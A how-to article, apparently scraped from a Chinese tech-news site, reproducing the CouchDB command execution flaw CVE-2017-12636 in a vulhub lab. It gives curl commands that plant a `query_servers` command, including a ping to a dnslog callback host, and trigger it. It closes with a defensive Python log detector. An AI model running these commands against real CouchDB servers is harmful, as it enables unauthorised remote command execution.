2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
In this issue, the editor walks through how to reproduce the CouchDB arbitrary command execution vulnerability CVE-2017-12636. The article gives a detailed, professional analysis and description, and I hope you get something out of it.
CouchDB is an open source document-oriented database management system that is accessed through a RESTful JSON (JavaScript Object Notation) API. The name "Couch" is an acronym for "Cluster Of Unreliable Commodity Hardware" and reflects CouchDB's goal of high scalability, providing high availability and reliability even on fault-prone hardware.
On November 15, 2017, CVE-2017-12635 and CVE-2017-12636 were disclosed. CVE-2017-12636 is an arbitrary command execution vulnerability: through the config API we can modify CouchDB's `query_servers` configuration, and the configured command is run when a view is designed and executed.
Affected versions: 1.x before 1.7.0 and 2.x before 2.1.1
Because exploitation requires a logged-in user, it is usually chained with CVE-2017-12635.
CVE-2017-12635 reproduction article link
The following is only a record of reproducing the vulnerability; the exploitation process is as follows:
1. Vulnerability environment
Target link: http://192.168.101.152:5984/
Opening http://192.168.101.152:5984/_utils/ shows the following
Because the API interfaces of CouchDB 2.x and 1.x differ, the exploitation steps also differ. The version demonstrated here is 1.6.0.
2. Vulnerability exploitation
Exploitation on 1.6.0:
Trigger the vulnerability by running the following commands in order, where vulhub:vulhub is the administrator account and password:
```bash
curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/_config/query_servers/cmd' -d '"ping test.kfqhkz.dnslog.cn"'
curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@192.168.101.152:5984/vultest/_temp_view?limit=10' -d '{"language": "cmd", "map": ""}' -H 'Content-Type: application/json'
```
After execution, check dnslog: the record shows the command executed successfully.
Exploitation on 2.x:
CouchDB 2.x introduced clustering, so changing configuration through the API requires the node name. This is simple: query `/_membership` with the account password:
```bash
curl http://vulhub:vulhub@your-ip:5984/_membership
```
As you can see, there is only one node here, named `nonode@nohost`.
Next, modify the configuration of `nonode@nohost`:
```bash
curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id > /tmp/success"'
```
Then, as with 1.6.0, first add a database and a document:
```bash
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
```
CouchDB 2.x removed `_temp_view`, so to trigger the command defined in `query_servers` we need to add a `_view` through a design document:
```bash
curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id": "_design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}' -H "Content-Type: application/json"
```
The command in `query_servers` is triggered when the `_view` is added.
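From the defender's side, both exploitation paths above leave the same traces: a write to the `query_servers` section through the config API (`/_config/...` on 1.x, `/_node/<node>/_config/...` on 2.x) and a persistent non-default entry in that section. The following Python is an added example, not code from the original article: it flags such config writes in access-log lines (the log line format is a constructed assumption, not CouchDB's exact output) and audits the JSON body of `GET /_config/query_servers` for entries beyond the stock `javascript` and `coffeescript` servers.

```python
import json
import re

# Constructed log format (assumption, not CouchDB's exact output): "<client-ip> <METHOD> <path> <status>".
LOG_RE = re.compile(r'^(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$')

# Config API paths that alter query_servers on 1.x (/_config/...) and 2.x (/_node/<node>/_config/...).
QS_PATH_RE = re.compile(r'^(?:/_node/(?P<node>[^/]+))?/_config/query_servers/(?P<name>[^/?]+)')

# Query servers shipped by default; anything else in the section (or a rewrite of these) deserves an alert.
DEFAULT_QUERY_SERVERS = {"javascript", "coffeescript"}


def find_query_server_changes(lines):
    """Return (ip, method, node, name, status) for every request that writes a query_servers entry."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m.group("method") not in ("PUT", "DELETE"):
            continue
        p = QS_PATH_RE.match(m.group("path"))
        if not p:
            continue
        node = p.group("node") or "(1.x, no node)"
        hits.append((m.group("ip"), m.group("method"), node, p.group("name"), int(m.group("status"))))
    return hits


def audit_query_servers(config_json):
    """Given the JSON body of GET /_config/query_servers, return {name: command} for non-default entries."""
    cfg = json.loads(config_json)
    return {name: cmd for name, cmd in cfg.items() if name not in DEFAULT_QUERY_SERVERS}


# Constructed sample input so the block runs stand-alone; IPs, paths and commands mirror the walkthrough above.
SAMPLE_LOG = [
    "192.168.101.5 GET /_utils/ 200",
    "192.168.101.5 PUT /_config/query_servers/cmd 200",
    "192.168.101.5 PUT /vultest 201",
    "192.168.101.5 POST /vultest/_temp_view?limit=10 200",
    "192.168.101.7 PUT /_node/nonode@nohost/_config/query_servers/cmd 200",
    "192.168.101.7 PUT /_config/query_servers/javascript 200",
]
SAMPLE_CONFIG = ('{"coffeescript": "couchjs main-coffee.js", "javascript": "couchjs main.js", '
                 '"cmd": "id > /tmp/success"}')

if __name__ == "__main__":
    for hit in find_query_server_changes(SAMPLE_LOG):
        print("query_servers write:", hit)
    print("non-default query servers:", audit_query_servers(SAMPLE_CONFIG))
```

A non-2xx status on a flagged line means the write was attempted but rejected, which is still worth reviewing because the request shows someone probing the config API.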
The above is how the editor reproduces the CouchDB arbitrary command execution vulnerability CVE-2017-12636. If you run into similar questions, refer to the analysis above. If you want to learn more, you are welcome to follow the industry information channel.
© 2024 shulou.com SLNews company. All rights reserved.